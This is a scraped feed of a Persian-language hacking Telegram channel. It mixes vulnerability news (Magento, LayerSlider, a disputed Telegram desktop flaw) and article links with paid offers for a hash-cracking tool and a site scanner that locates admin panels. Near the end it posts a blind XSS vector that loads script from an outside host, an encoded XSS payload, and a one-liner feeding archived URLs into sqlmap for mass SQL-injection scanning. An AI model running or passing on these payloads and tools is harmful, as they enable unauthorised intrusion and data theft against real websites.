Eʀᴏ ··ʜᴀᴄᴋ··

By reading the article below، he would find out what the "SSRF" bug is and what it does.

🔗Article Address

@EroHack | Boost

بلاگ گروه لیان

SSRF چیست؟ تشریح آسیب‌پذیری SSRF + دانلود مقاله

آسیب پذیری SSRF چیست؟ این نوع حمله باعث می‌شود که هکر بتواند درخواست های جعلی از سمت سرور ارسال کند که کاربرد های زیادی که به تشریح آن میپردازیم .

👍1343🔥2

1.5K views13:24

Eʀᴏ ··ʜᴀᴄᴋ··

Eʀᴏ ··ʜᴀᴄᴋ·· pinned «یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0»

09:07

Eʀᴏ ··ʜᴀᴄᴋ··

‼️آسیب پذیری در مجنتو برای هک وب سایت ها و تزریق بدافزار استفاده می شود

متخصصان Sansec هشدار دادند که هکرها در حال حاضر از آسیب‌پذیری اخیر در Magento (CVE-2024-20720) استفاده می‌کنند و از آن برای معرفی یک درب پشتی دائمی به سایت‌های تجارت الکترونیک استفاده می‌کنند.
➖➖➖➖➖➖➖➖➖
@EroHack | Boost

152❤1🔥11

1.32K views16:09

Eʀᴏ ··ʜᴀᴄᴋ··

‼️آسیب پذیری حیاتی در پلاگین وردپرس LayerSlider میلیون ها سایت را تحت تاثیر قرار می دهد

یک آسیب‌پذیری حیاتی تزریق SQL در افزونه محبوب LayerSlider برای وردپرس می‌تواند برای استخراج اطلاعات حساس از پایگاه‌های داده، مانند هش رمز عبور، استفاده شود.

➖➖➖➖➖➖➖➖➖
@EroHack | Boost

144❤2👍2

1.31K views09:34

Eʀᴏ ··ʜᴀᴄᴋ··

🔴 یک آسیب پذیری در توییتر توسط CertiKAlert منتشر شده، مبنی بر وجود آسیب پذیری RCE با خطر بالا ، در نسخه ی دسکتاپ تلگرام.
به گفته این اکانت این آسیب پذیری پتانسیل اجرای کد رو از طریق انتشار فایلهای مدیا مانند عکس و ویدیو رو میده.
پیشنهاد شده که از قسمت زیر دانلود اتوماتیک رو غیرفعال کنید :

Settings > Advanced > Automatic Media Download > Disable auto-download for "Photos", "Videos", and "Files" across all chat types (Private chats, groups, and channels)

تلگرام زیر همین پست، گفته که این ویدیو رو بعنوان آسیب پذیری تایید نمیکنه و احتمالا یه فریب یا شوخیه.

🆔 @EroHack
➡️ Boost

👍12🗿442

1.51K viewsedited 10:23

Eʀᴏ ··ʜᴀᴄᴋ··

0:37

👍176❤3

1.43K views12:30

Eʀᴏ ··ʜᴀᴄᴋ··

Voice message

🛡دوستان حتما گوش کنید🛡

👍165❤3

1.36K views12:51

Eʀᴏ ··ʜᴀᴄᴋ··

Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
@EroHack | Boost

GitHub

GitHub - Edr4/XSS-Bypass-Filters

Contribute to Edr4/XSS-Bypass-Filters development by creating an account on GitHub.

🔥178❤138👍1376

2.6K viewsedited 13:58

Eʀᴏ ··ʜᴀᴄᴋ··

Eʀᴏ ··ʜᴀᴄᴋ·· pinned a voice message

15:53

Eʀᴏ ··ʜᴀᴄᴋ··

Eʀᴏ ··ʜᴀᴄᴋ·· pinned «🛡دوستان حتما گوش کنید🛡»

16:42

Eʀᴏ ··ʜᴀᴄᴋ··

🤨In this article, we will discuss the network protocols, to see what vulnerabilities they have.

➕

Article address

@EroHack | Boost

Please open Telegram to view this post

VIEW IN TELEGRAM

سکان آکادمی

پروتکل‌های رایج شبکه و آسیب پذیری های آن‌ها

پروتکل‌های شبکه مجموعه‌ای از قوانین تعیین شده هستند که تبادل اطلاعات را کنترل می‌کنند. آسیب پذیری‌های متعددی در این پروتکل‌ها وجود دارد که منجر به بهره برداری از آن‌ها شده و امنیت شبکه را با چالش‌های جدی مواجه می کند.

👍1443❤1🔥11

1.53K views10:15

Eʀᴏ ··ʜᴀᴄᴋ··

📦استفاده ابزار: برض مثال پسورد شما ۱۲۳۴۵ هستش وقتی به هش تبدیل میشه به این شکل در میاد: 1ag6Gwjk09hapkeUWU حالا شما با استفاده از ابزار ما میتونید این هش رو کرک کنید و به پسورد اصلی برسید. ❤️برای تهیه ابزار به آیدی زیر پیام بدید ➕ID: فروشه بسته شد 👌یادتون…

😆 ابزار کرک هش فروشش باز شد.

🤬 اول به صورت کامل ویدیو و توضیحاته بالا رو بخونید تا کاربرد ابزار رو بدونید به چه صورته

😮 برای خرید به آیدی زیر پیام بدید.

💵قیمت: ۲۵٫۰۰۰ هزار تومان

💬

@GoRunEro

Please open Telegram to view this post

VIEW IN TELEGRAM

10🔥4❤211

1.57K viewsedited 15:23

Eʀᴏ ··ʜᴀᴄᴋ··

Voice message

این ویس روهم گوش کنید⚡️

Please open Telegram to view this post

VIEW IN TELEGRAM

11❤2👍1

1.52K views15:26

Eʀᴏ ··ʜᴀᴄᴋ··

پای کار باشید🎶
ری اکشن فراموش نشه🔥

👍

Please open Telegram to view this post

VIEW IN TELEGRAM

184👍3

1.37K views18:32

🔥 معرفی ابزار Scan Ero 🛍

😆توضیحات:

شما میتوانید با استفاده از ابزار بالا سایت مورد نظر خودتون رو اسکن کنید ip سایت رو پیدا کنید و غیره حتی میتونید پنل ادمین سایت روهم پیدا کنید.

☠️

💬

@GoRunEro

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥1063👍2👎1🤯1

1.61K views19:33

Eʀᴏ ··ʜᴀᴄᴋ··

🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='

🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

➖

🔈

@EroHack

➕

Boost

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥93❤2

1.51K views08:40

Eʀᴏ ··ʜᴀᴄᴋ··

Payload:

"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

➖

🌐

@EroHack

✅

Boost

Please open Telegram to view this post

VIEW IN TELEGRAM

933👍1

1.42K views14:44

Eʀᴏ ··ʜᴀᴄᴋ··

🆕

SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#Sqlmap #BugBounty

➖